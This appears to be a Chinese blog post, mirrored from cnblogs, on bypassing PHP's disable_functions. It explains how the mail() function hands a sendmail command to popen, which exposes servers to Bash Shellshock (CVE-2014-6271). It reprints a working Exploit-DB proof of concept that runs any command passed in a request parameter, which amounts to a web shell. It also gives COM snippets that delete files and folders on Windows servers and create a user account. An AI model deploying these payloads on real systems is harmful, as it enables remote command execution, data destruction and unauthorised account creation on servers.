zoukankan      html  css  js  c++  java
  • PHP Execute Command Bypass Disable_functions

    先简单说一下php调用mail()函数的过程。
    看到源码ext/mail.c

    236行:

    char *sendmail_path = INI_STR("sendmail_path");
    char *sendmail_cmd = NULL;

    从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的:

    ; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").
    ;sendmail_path =

    注释中可以看到,send_mail默认值为"sendmail -t -i".

    extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。
    如下:

    if (!sendmail_path) {
    #if (defined PHP_WIN32 || defined NETWARE)
        /* handle old style win smtp sending */
        if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
          if (tsm_errmsg) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
            efree(tsm_errmsg);
          } else {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
          }
          MAIL_RET(0);
        }
        MAIL_RET(1);
    #else
        MAIL_RET(0);
    #endif
      }
      if (extra_cmd != NULL) {
        spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
      } else {
        sendmail_cmd = sendmail_path;
      }

    之后执行:

    #ifdef PHP_WIN32
      sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
    #else
      /* Since popen() doesn't indicate if the internal fork() doesn't work
       * (e.g. the shell can't be executed) we explicitly set it to 0 to be
       * sure we don't catch any older errno value. */
      errno = 0;
      sendmail = popen(sendmail_cmd, "w");
    #endif

    将sendmail_cmd丢给popen执行。
    如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。

    影响版本:php 各版本

    修复方法:修复CVE-2014-6271

    给出POC(http://www.exploit-db.com/exploits/35146/)如下:

    <?php
    # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
    # Google Dork: none
    # Date: 10/31/2014
    # Exploit Author: Ryan King (Starfall)
    # Vendor Homepage: http://php.net
    # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
    # Version: 5.* (tested on 5.6.2)
    # Tested on: Debian 7 and CentOS 5 and 6
    # CVE: CVE-2014-6271
    
    function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
       $tmp = tempnam(".","data");
       putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
       // In Safe Mode, the user may only alter environment variableswhose names
       // begin with the prefixes supplied by this directive.
       // By default, users will only be able to set environment variablesthat
       // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
       // PHP will let the user modify ANY environment variable!
       mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail
       $output = @file_get_contents($tmp);
       @unlink($tmp);
       if($output != "") return $output;
       else return "No output, or not vuln.";
    }
    echo shellshock($_REQUEST["cmd"]);
    ?>

    006.jpg

    <?php
    $mPath = str_repeat(“..”,20);
    $FSOdelFile = new COM(‘Scripting.FileSystemObject’);
    //利用了wshom.ocx
    $FSOdelFile->DeleteFile($mPath.”.*.dat”, True);
    //删除C区根目录的所有dat文件?>
    
    wshom.ocx中的DeleteFolder
    利用这个函数可以删除服务器上的文件夹,很恐怖哦。测试代码如下:
    
    <?php
    $mPath = str_repeat(“..”,20);
    $FSOdelFolder = new COM(‘Scripting.FileSystemObject’);
    //使用wshom.ocx
    $FSOdelFolder->DeleteFolder($mPath.”.11″, True);
    //删除特定的文件夹
    ?>
    
    访问之后,成功删除了c:11这个文件夹。
    
    shgina.dll中Create函数创建账户
    这个漏洞的测试代码如下:
    
    <?php
    $user = new COM(‘{60664CAF-AF0D-0004-A300-5C7D25FF22A0}’);
    //利用shgina.dll$user->Create(“asd”);
    //创建账户asd
    ?>
  • 相关阅读:
    12-单表查询
    11-数据的增删改
    10-外键的变种 三种关系
    09-完整性约束
    08-数据类型(2)
    07-数据类型
    06-表的操作
    05-库的操作
    Spring:(六) 代理模式
    Spring:(五) 注解
  • 原文地址:https://www.cnblogs.com/hookjoy/p/4106601.html
Copyright © 2011-2022 走看看